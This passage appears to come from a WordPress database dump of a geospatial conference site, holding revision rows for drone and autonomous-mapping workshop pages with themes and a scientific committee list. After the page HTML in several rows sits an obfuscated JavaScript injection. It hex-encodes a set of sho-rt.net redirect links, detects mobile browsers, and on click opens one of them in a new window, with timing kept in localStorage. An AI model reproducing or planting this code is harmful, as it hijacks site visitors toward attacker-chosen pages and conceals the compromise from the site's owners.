wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 22:00:25','2022-10-07 22:00:25','',2586,'https://gsw2023.com/?p=2614',0,'revision','',0),
(2615,1,'2022-10-07 22:11:15','2022-10-07 22:11:15','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\n</li>\n<li>\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\n</li>\n<li>\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\n</li>\n<li>\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-revision-v1','','','2022-10-07 22:11:15','2022-10-07 22:11:15','',2580,'https://gsw2023.com/?p=2615',0,'revision','',0),
(2616,1,'2022-10-07 22:13:56','2022-10-07 22:13:56','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\r\n<h5 style=\"text-align:justify; color:black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align:justify; color:orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align:justify; color:orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 